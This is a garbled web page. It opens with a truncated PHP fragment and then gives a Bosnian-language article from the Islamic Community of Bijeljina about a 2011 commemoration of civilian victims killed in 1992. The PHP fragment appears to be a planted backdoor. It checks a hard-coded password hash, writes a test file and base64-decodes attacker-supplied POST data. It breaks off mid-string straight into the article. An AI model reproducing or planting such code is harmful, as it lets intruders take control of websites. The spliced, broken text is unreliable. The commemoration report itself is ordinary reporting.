function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" TEVHID, DOVA I FATIHA ZA ŽRTVE ZLOČINA - Medžlis Islamske zajednice Bijeljina

TEVHID, DOVA I FATIHA ZA ŽRTVE ZLOČINA

TEVHID, DOVA I FATIHA ZA ŽRTVE ZLOČINA

Medžlis Islamske zajednice Bijeljina je u subotu 02.04.2011.g. obilježio 2. april, Dan civilnih žrtava zločina u Bijeljini. Toga dana 1992. godine u bijeljinskoj mrtvačnici bilo je 80 tijela nevino ubijenih, koja su u bijeljinska mezarja pokopana bez vjerskog obreda, a tijela drugih stradalih bacana su i u rijeku Drinu, da bi godinama kasnije pronalažena na grobljima u Šapcu i Sremskoj Mitrovici.

Mnogi od nestalih ni do danas nisu pronađeni, a zvanični spisak koji je aprila 1992. godine objavila općinska vlast navodi imena 46 ubijenih, uglavnom žena i starijih ljudi.
Islamska zajednica u Bijeljini svake godine obilježava 2. april u znak sjećanja na nedužne žrtve. Tevhid civilnim žrtvama zločina proučen je u Atik džamiji, a nakon podne namaza vjernici predvođeni imamom Mirsadom ef. Okanovićem i glavnim imamom Samirom ef. Camićem, proučili su dovu i fatihu na Šehidskom mezarju Lipić-Selimovići, gdje su pokopani posmrtni ostaci trideset žrtava zločina u ovom gradu. Prošle godine podignuti su jednoobrazni nišani sa ajetom iz Kur'ana: “Ako neko ubije nekoga koji nije ubio nikoga ili na zemlji nered ne čini, kao da je sve ljude na zemlji poubijao.”
Samir ef. Camić podsjetio je okupljene vjernike na značaj ovog datuma uz riječi dove upućene Allahu dž.š.: “Allahu sveznajući, nauči nas da govorimo istinu i da drugima preporučujemo da govore istinu, da budemo strpljivi i da drugima preporučujemo strpljenje, te da budemo pravedni i tolerantni i da drugima preporučujemo pravdu i tolerantnost. Gospodaru naš, mi druge nade osim Tebe nemamo. Sva vrata osim Tvojih su nam zatvorena. Ti mnogo robova imaš, a mi osim Tebe drugog Gospodara nemamo.”